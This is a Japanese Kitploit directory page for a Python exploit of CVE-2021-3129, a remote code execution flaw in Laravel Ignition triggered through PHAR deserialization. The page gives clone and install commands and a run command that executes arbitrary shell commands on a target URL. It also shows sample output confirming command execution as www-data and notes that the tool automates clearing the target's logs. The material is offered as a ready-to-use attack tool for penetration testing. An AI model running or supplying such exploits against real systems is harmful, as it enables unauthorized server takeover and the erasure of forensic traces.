Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-3129 — CVE-2021-3129のPythonエクスプロイト。PHAR逆シリアル化を自動化して、脆弱なLaravel Ignitionエンドポイントで任意のコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/0x0d3ad/cve-2021-3129
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHub0x0d3ad/cve-2021-3129

CVE-2021-3129

CVE-2021-3129のPythonエクスプロイト。PHAR逆シリアル化を自動化して、脆弱なLaravel Ignitionエンドポイントで任意のコマンドを実行します。

リポジトリを見る
1011年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-3129 Laravel Ignition RCE エクスプロイト

これは、Laravel に Ignition パッケージがインストールされている場合のリモートコード実行脆弱性 CVE-2021-3129 に対する Python エクスプロイトスクリプトです。この脆弱性により、攻撃者は PHAR デシリアライゼーションを介して任意のシステムコマンドを実行できます。

特徴

  • phpggc を使用して PHAR ペイロードを自動生成
  • 任意のコマンド(例:id、whoami など)をユーザー入力として受け付け
  • ログのクリア、ペイロードの注入、ログの PHAR への変換、デシリアライゼーションのトリガーを含む、エクスプロイトプロセス全体を自動化

前提条件

  • Python 3.x
  • requests ライブラリ
  • システムにインストールされた PHP
  • インストールされた phpggc(PHAR ペイロード生成用)

インストール

  1. リポジトリをクローン:

    root@kitploit:~
    git clone https://github.com/0x0d3ad/CVE-2021-3129.git
    cd CVE-2021-3129
    
  2. 必要な Python パッケージをインストール:

    root@kitploit:~
    pip install requests
    
  3. 対象の URL とコマンドを指定してスクリプトを実行:

    root@kitploit:~
    python3 CVE-2021-3129.py http://example.com --cmd 'id'
    

    出力例:

    root@kitploit:~
    [+] Generating PHAR payload for command: id
    [+] Trying to clear logs
    [+] Logs cleared
    [+] Convert log file to PHAR
    [+] Successfully converted logs to PHAR
    [+] PHAR deserialized
    ---------------------------------------
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    ---------------------------------------
    [+] Trying to clear logs
    [+] Logs cleared
    

引数

  • target(必須):脆弱な Laravel アプリケーションの URL。
  • --cmd(オプション):対象で実行するコマンド(デフォルト:whoami)。
  • --log_path(オプション):使用するログファイルのパス(デフォルト:../storage/logs/laravel.log)。

POC

POC

POC

ツールをダウンロード